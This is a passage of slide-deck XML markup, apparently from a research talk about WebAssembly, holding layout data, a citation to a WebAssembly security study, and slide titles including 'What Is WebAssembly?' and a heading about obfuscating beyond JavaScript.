              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod" startAt="32"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A. Hilbig, D. Lehmann, and M. Pradel, “An Empirical Study of Real-World WebAssembly Binaries: Security, Languages, Use Cases,” in WWW ’21: The Web Conference 2021, Virtual Event / Ljubljana, Slovenia, April 19-23, 2021, J. Leskovec, M. Grobelnik, M. Najork, J. Tang, and L. Zia, Eds. ACM / IW3C2, 2021, pp. 2696–2708.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311700" y="187541"/>
            <a:ext cx="8520600" cy="697713"/>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WebAssembly Provides a New Opportunity</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4572000" y="2764581"/>
            <a:ext cx="2961813" cy="1732925"/>
            <a:chOff x="4572000" y="2764581"/>
            <a:chExt cx="2961813" cy="1732925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="199" name="Google Shape;199;p31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5796453" y="2764581"/>
              <a:ext cx="1737360" cy="1732925"/>
              <a:chOff x="4474551" y="317038"/>
              <a:chExt cx="1737360" cy="1732925"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="200" name="Google Shape;200;p31"/>
              <p:cNvPicPr preferRelativeResize="0"/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId3">
                <a:alphaModFix/>
              </a:blip>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4474551" y="317038"/>
                <a:ext cx="1737360" cy="1732925"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="201" name="Google Shape;201;p31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4625327" y="485980"/>
                <a:ext cx="731520" cy="73152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202" name="Google Shape;202;p31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6092888" y="2990830"/>
              <a:ext cx="502920" cy="616077"/>
              <a:chOff x="6805343" y="702310"/>
              <a:chExt cx="502920" cy="618979"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="203" name="Google Shape;203;p31"/>
              <p:cNvPicPr preferRelativeResize="0"/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix/>
              </a:blip>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6805343" y="702310"/>
                <a:ext cx="502920" cy="618979"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="204" name="Google Shape;204;p31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6902863" y="843097"/>
                <a:ext cx="303289" cy="4019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767CFC"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="205" name="Google Shape;205;p31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4572000" y="3108960"/>
              <a:ext cx="457176" cy="450166"/>
              <a:chOff x="6757012" y="692536"/>
              <a:chExt cx="457176" cy="450166"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="206" name="Google Shape;206;p31"/>
              <p:cNvPicPr preferRelativeResize="0"/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix/>
              </a:blip>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6795615" y="692536"/>
                <a:ext cx="365760" cy="450166"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="207" name="Google Shape;207;p31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6757012" y="779995"/>
                <a:ext cx="45717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767CFC"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>WA</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4956048" y="3108960"/>
              <a:ext cx="457176" cy="450166"/>
              <a:chOff x="6766637" y="692536"/>
              <a:chExt cx="457176" cy="450166"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="209" name="Google Shape;209;p31"/>
              <p:cNvPicPr preferRelativeResize="0"/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix/>
              </a:blip>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6785887" y="692536"/>
                <a:ext cx="365760" cy="450166"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="210" name="Google Shape;210;p31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6766637" y="779995"/>
                <a:ext cx="45717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767CFC"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>WA</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="211" name="Google Shape;211;p31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5303520" y="3108960"/>
              <a:ext cx="457177" cy="450166"/>
              <a:chOff x="6760266" y="692536"/>
              <a:chExt cx="457177" cy="450166"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="212" name="Google Shape;212;p31"/>
              <p:cNvPicPr preferRelativeResize="0"/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4">
                <a:alphaModFix/>
              </a:blip>
              <a:srcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6795615" y="692536"/>
                <a:ext cx="365760" cy="450166"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="213" name="Google Shape;213;p31"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6760266" y="779995"/>
                <a:ext cx="457177"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767CFC"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>WA</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507026" y="1880660"/>
            <a:ext cx="6207300" cy="954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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Obfuscate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>beyond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> the JavaScript language</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;215;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latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-48142" y="63226"/>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3200" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>What Is WebAssembly?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="223" name="Google Shape;223;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="551843" y="3569865"/>
            <a:ext cx="914400" cy="710348"/>
            <a:chOff x="5390644" y="4641895"/>
            <a:chExt cx="1952207" cy="1516566"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="224" name="Google Shape;224;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5390644" y="4641895"/>
              <a:ext cx="1952207" cy="1516566"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E5E5E5"/>
            </a:solid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5" name="Google Shape;225;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5529263" y="4835524"/>
              <a:ext cx="1033462" cy="80963"/>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6" name="Google Shape;226;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6199823" y="5193664"/>
              <a:ext cx="1033462" cy="80963"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C4C4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7" name="Google Shape;227;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5529262" y="5194456"/>
              <a:ext cx="516731" cy="80171"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C4C4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8" name="Google Shape;228;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5531168" y="5471633"/>
              <a:ext cx="221932" cy="80171"/>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9" name="Google Shape;229;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6366748" y="5476479"/>
              <a:ext cx="521732" cy="75325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C4C4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32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867876" y="5479253"/>
              <a:ext cx="441484" cy="75325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F69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1" name="Google Shape;231;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6716553" y="5753656"/>
              <a:ext cx="516731" cy="75325"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F69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2" name="Google Shape;232;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5867875" y="5750836"/>
              <a:ext cx="714137" cy="86557"/>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33" name="Google Shape;233;p32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1371600" y="1130786"/>
            <a:ext cx="2011680" cy="1251163"/>
            <a:chOff x="8094775" y="1462700"/>
            <a:chExt cx="3636308" cy="2718774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Google Shape;234;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8094775" y="1732791"/>
              <a:ext cx="3636308" cy="2448683"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E5E5E5"/>
            </a:solid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5" name="Google Shape;235;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8094775" y="1462700"/>
              <a:ext cx="3636308" cy="270092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C4C4C4"/>
            </a:solid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6" name="Google Shape;236;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11369242" y="1501587"/>
              <a:ext cx="180975" cy="185125"/>
              <a:chOff x="8435540" y="1505183"/>
              <a:chExt cx="180975" cy="185125"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="237" name="Google Shape;237;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8435540" y="1505183"/>
                <a:ext cx="180975" cy="18512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8" name="Google Shape;238;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8456972" y="1528002"/>
                <a:ext cx="138112" cy="139881"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F69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39" name="Google Shape;239;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11087064" y="1508781"/>
              <a:ext cx="180975" cy="185125"/>
              <a:chOff x="8435540" y="1505183"/>
              <a:chExt cx="180975" cy="185125"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="240" name="Google Shape;240;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8435540" y="1505183"/>
                <a:ext cx="180975" cy="18512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1" name="Google Shape;241;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8456972" y="1528002"/>
                <a:ext cx="138112" cy="139881"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="5FB7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42" name="Google Shape;242;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9985727" y="1786675"/>
              <a:ext cx="1652868" cy="737492"/>
              <a:chOff x="6214914" y="1852546"/>
              <a:chExt cx="1652868" cy="737492"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="243" name="Google Shape;243;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6305549" y="1913764"/>
                <a:ext cx="1447801" cy="676274"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF7E7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4" name="Google Shape;244;p32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6214914" y="1852546"/>
                <a:ext cx="1652868" cy="6595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1" u="none" strike="noStrike" cap="none">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:rPr>
                  <a:t>HTML</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="245" name="Google Shape;245;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9787704" y="2273568"/>
              <a:ext cx="1447801" cy="778490"/>
              <a:chOff x="6305549" y="1860970"/>
              <a:chExt cx="1447801" cy="778490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="246" name="Google Shape;246;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6305549" y="1963185"/>
                <a:ext cx="1447801" cy="676275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="427AE7"/>
              </a:solidFill>
              <a:ln w="19050" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="E5E5E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7" name="Google Shape;247;p32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6326103" y="1860970"/>
                <a:ext cx="1379289" cy="65957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1" u="none" strike="noStrike" cap="none">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:rPr>
                  <a:t>CSS</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="248" name="Google Shape;248;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9511084" y="2802874"/>
              <a:ext cx="1447802" cy="766134"/>
              <a:chOff x="6305548" y="1935102"/>
              <a:chExt cx="1447802" cy="766134"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="249" name="Google Shape;249;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6305549" y="2024961"/>
                <a:ext cx="1447801" cy="676275"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:ln w="19050" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="E5E5E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0" name="Google Shape;250;p32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6305548" y="1935102"/>
                <a:ext cx="1379289" cy="60294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1" u="none" strike="noStrike" cap="none">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:rPr>
                  <a:t>JS</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="251" name="Google Shape;251;p32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9168561" y="3347864"/>
              <a:ext cx="1447800" cy="796985"/>
              <a:chOff x="6305550" y="2022307"/>
              <a:chExt cx="1447800" cy="796985"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="252" name="Google Shape;252;p32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6305550" y="2086735"/>
                <a:ext cx="1447800" cy="676277"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="767CFC"/>
              </a:solidFill>
              <a:ln w="19050" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="E5E5E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767CFC"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Google Shape;253;p32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6512375" y="2022307"/>
                <a:ext cx="1157006" cy="7969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1" u="none" strike="noStrike" cap="none">
                    <a:solidFill>
                      <a:schemeClr val="lt1"/>
                    </a:solidFill>
                    <a:latin typeface="Arial"/>
                    <a:ea typeface="Arial"/>
                    <a:cs typeface="Arial"/>
                    <a:sym typeface="Arial"/>
                  </a:rPr>
                  <a:t>WA</a:t>
                </a:r>
                <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="254" name="Google Shape;254;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8265564" y="1918516"/>
              <a:ext cx="748074" cy="193051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5" name="Google Shape;255;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8362951" y="2076450"/>
              <a:ext cx="514350"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6" name="Google Shape;256;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8409946" y="2205990"/>
              <a:ext cx="288547"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7" name="Google Shape;257;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8620126" y="2335065"/>
              <a:ext cx="288547"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8" name="Google Shape;258;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8495328" y="2452370"/>
              <a:ext cx="203166"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9" name="Google Shape;259;p32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8369631" y="2587794"/>
              <a:ext cx="369175"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0" name="Google Shape;260;p32"/>
            <p:cNvSpPr/>
